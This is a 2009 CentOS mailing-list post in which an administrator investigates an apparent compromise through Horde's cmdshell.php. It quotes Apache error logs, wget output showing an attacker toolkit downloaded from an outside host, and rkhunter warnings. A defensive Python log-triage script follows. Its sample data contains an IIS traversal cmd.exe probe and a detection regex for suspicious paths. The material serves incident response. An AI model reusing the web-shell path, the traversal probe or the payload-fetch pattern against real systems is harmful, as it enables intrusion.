[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Linux Advocate
linuxhousedn at yahoo.com
Sun Jun 14 05:37:08 UTC 2009
replies below...
----- Original Message ----
> From: Filipe Brandenburger <filbranden at gmail.com>
> To: CentOS mailing list <centos at centos.org>
> Sent: Saturday, June 13, 2009 9:58:51 PM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> I suggest you start by looking at Apache's logs,
Filipe, good idea. Will do.
>look for very strange
> URLs hat have nothing to do with the applications you have there, like
> .exe files (IIS attacks) or other .cgi or .php files that will give
> you 404 errors. Also look for things in the error_log file. And then
> look for other accesses from the same IP (assuming it's always from
> the same IP) to files that do exist, this will probably lead you to
> what was used to break in. Continue the investigation from there.
A. I have found a suspicious IP around the dates (based on the dates of files in the atack folder) when I think this break-in could have happened:
86.126.71.74 <--- from Romania (I am in Singapore)
This IP seemed to have generated the most error messages. There are other not-from-my-country IPs but way, way fewer errors from them.
There are many error messages (generated by 86.126.71.74) in the Apache error log, as below:
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0
cat: vuln.txt: No such file or directory
<--- This vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the attacker looking for this file and then planted it later? Or something like that?
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://60.54.174.146/horde/admin/cmdshell.php
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
What does Len 255 < 256 indicate? Some kind of buffer overflow?
B. Can I conclude that the attacker came through the Horde framework (cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!
[root at fwg]# yum info horde
Name : horde
Arch : noarch
Version : 3.1.7
Release : 1.el5.centos
Size : 18 M
Repo : installed
Summary : The common Horde Framework for all Horde modules.
URL : http://www.horde.org/
There are some Google hits on cmdshell.php being used to execute arbitrary commands?
There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy"
I haven't found more info yet. Any tips on this would be most welcome.
There is also this line in the error log:
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
Is the line above normal?
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer:
http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7
--14:47:00-- http://mv.do.am/unix.tgz
Rezolvare mv.do.am... 208.100.61.101
Connecting to mv.do.am|208.100.61.101|:80... conectat.
Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK
Dimensiune: 1614224 (1,5M) [application/octet-stream]
Saving to: `unix.tgz'
0K .......... .......... .......... .......... .......... 3% 17,6K 87s
50K .......... .......... .......... .......... .......... 6% 33,7K 64s
100K .......... .......... .......... .......... .......... 9% 33,5K 55s
150K .......... .......... .......... .......... .......... 12% 45,6K 48s
200K .......... .......... .......... .......... .......... 15% 52,8K 42s
250K .......... .......... .......... .......... .......... 19% 50,3K 38s
300K .......... .......... .......... .......... .......... 22% 47,9K 35s
350K .......... .......... .......... .......... .......... 25% 54,8K 32s
400K .......... .......... .......... .......... .......... 28% 48,7K 30s
450K .......... .......... .......... .......... .......... 31% 36,9K 28s
500K .......... .......... .......... .......... .......... 34% 34,6K 27s
550K .......... .......... .......... .......... .......... 38% 32,9K 26s
600K .......... .......... .......... .......... .......... 41% 28,4K 26s
650K .......... .......... .......... .......... .......... 44% 36,7K 24s
700K .......... .......... .......... .......... .......... 47% 34,3K 23s
750K .......... .......... .......... .......... .......... 50% 34,0K 22s
800K .......... .......... .......... .......... .......... 53% 33,1K 20s
850K .......... .......... .......... .......... .......... 57% 47,7K 19s
900K .......... .......... .......... .......... .......... 60% 27,4K 18s
950K .......... .......... .......... .......... .......... 63% 13,0K 18s
1000K .......... .......... .......... .......... .......... 66% 28,3K 16s
1050K .......... .......... .......... .......... .......... 69% 38,1K 15s
1100K .......... .......... .......... .......... .......... 72% 29,3K 13s
1150K .......... .......... .......... .......... .......... 76% 44,1K 11s
1200K .......... .......... .......... .......... .......... 79% 56,6K 10s
1250K .......... .......... .......... .......... .......... 82% 44,7K 8s
1300K .......... .......... .......... .......... .......... 85% 39,8K 7s
1350K .......... .......... .......... .......... .......... 88% 50,8K 5s
1400K .......... .......... .......... .......... .......... 91% 40,2K 4s
1450K .......... .......... .......... .......... .......... 95% 37,3K 2s
1500K .......... .......... .......... .......... .......... 98% 43,1K 1s
1550K .......... .......... ...... 100% 44,5K=45s
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK???
AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files... [ Warning! ]
---------------
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
---------------
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory)
Should I delete these files? Are the man files normally .gz or .bz2?
There is also a similar entry, where another file called unix2.tgz was downloaded....
But I can't find these files on the hard disk?
Guys, I am out of my league here. All assistance is deeply appreciated.
>
> HTH,
> Filipe
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
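The log-review procedure Filipe describes (find 404s for URLs that have nothing to do with the site, rank clients by error_log entries, then pull everything those same IPs reached that does exist) can be scripted rather than grepped by hand. The following is an added example written for this page, not code from the thread or from the Apache or CentOS projects. The access_log and error_log lines and the IP addresses (RFC 5737 documentation ranges) are constructed; the suspicious-path pattern and the "at least two error entries" threshold are assumptions to tune for your own site.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" access_log format, one request per line.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" '
    r'(?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "[^"]*")?'
)
# Apache 2.2 error_log format. Start-up [notice] lines (such as the SELinux
# context notice) carry no "[client ...]" field and are deliberately skipped.
ERROR_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[^\]]+)\] (?P<msg>.*)$'
)
# Assumed pattern for requests a Horde/PHP site never serves: IIS-style cmd.exe
# and traversal probes, stray .cgi/.asp scripts. A 404 on these is scanner noise.
SUSPICIOUS_PATH = re.compile(
    r'\.(exe|dll|cgi|pl|asp|aspx)(\?|$)|cmd\.exe|/scripts/|\.\./', re.I
)

# Constructed sample logs (documentation IPs, not from the original post).
SAMPLE_ACCESS = """\
203.0.113.7 - - [18/May/2009:05:31:02 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 "-" "-"
203.0.113.7 - - [18/May/2009:05:31:05 +0800] "GET /cgi-bin/test.cgi HTTP/1.0" 404 280 "-" "-"
203.0.113.7 - - [18/May/2009:05:39:12 +0800] "GET /horde/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [18/May/2009:05:39:39 +0800] "POST /horde/admin/cmdshell.php HTTP/1.1" 200 812 "http://198.51.100.20/horde/admin/cmdshell.php" "Mozilla/5.0"
198.51.100.9 - - [18/May/2009:06:02:17 +0800] "GET /horde/imp/login.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
198.51.100.9 - - [18/May/2009:06:02:20 +0800] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
"""
SAMPLE_ERROR = """\
[Mon May 18 05:39:39 2009] [error] [client 203.0.113.7] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://198.51.100.20/horde/admin/cmdshell.php
[Mon May 18 05:40:01 2009] [error] [client 203.0.113.7] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://198.51.100.20/horde/admin/cmdshell.php
[Mon May 18 06:02:20 2009] [error] [client 198.51.100.9] File does not exist: /var/www/html/favicon.ico
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
"""


def parse_access(line):
    """Return a dict for one access_log line, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def probing_ips(access_lines):
    """Step 1: clients whose 404s hit paths the site never served -> {ip: [paths]}."""
    probes = defaultdict(list)
    for line in access_lines:
        rec = parse_access(line)
        if rec and rec['status'] == 404 and SUSPICIOUS_PATH.search(rec['path']):
            probes[rec['ip']].append(rec['path'])
    return dict(probes)


def errors_by_client(error_lines):
    """Step 2: number of error_log entries per client IP."""
    return Counter(m.group('ip') for m in map(ERROR_RE.match, error_lines) if m)


def reached_by(access_lines, ips):
    """Step 3: what the flagged clients reached that *does* exist (2xx/3xx)."""
    reached = defaultdict(list)
    for line in access_lines:
        rec = parse_access(line)
        if rec and rec['ip'] in ips and 200 <= rec['status'] < 400:
            reached[rec['ip']].append((rec['ts'], rec['method'], rec['path'], rec['status']))
    return dict(reached)


def triage(access_lines, error_lines, min_errors=2):
    """Combine the three steps; min_errors is an assumed noise threshold."""
    probes = probing_ips(access_lines)
    noisy = errors_by_client(error_lines)
    suspects = set(probes) | {ip for ip, n in noisy.items() if n >= min_errors}
    return {
        'probes': probes,
        'error_counts': dict(noisy),
        'reached': reached_by(access_lines, suspects),
    }


if __name__ == '__main__':
    report = triage(SAMPLE_ACCESS.splitlines(), SAMPLE_ERROR.splitlines())
    for ip, paths in report['probes'].items():
        print(f'{ip}: {len(paths)} probing 404(s), e.g. {paths[0]}')
    for ip, n in report['error_counts'].most_common():
        print(f'{ip}: {n} error_log entries')
    for ip, hits in report['reached'].items():
        for ts, method, path, status in hits:
            print(f'{ip} reached {method} {path} -> {status} at {ts}')
```

On a real box, replace the sample strings with the contents of /var/log/httpd/access_log and error_log (and their rotated copies, since the dates in question span several weeks). The "reached" list is the part worth reading line by line: a 404-probing client that later gets 200s from an admin script is the access path to confirm, and the same IP is the pivot for the other logs (/var/log/secure, cron, the timestamps on the dropped files).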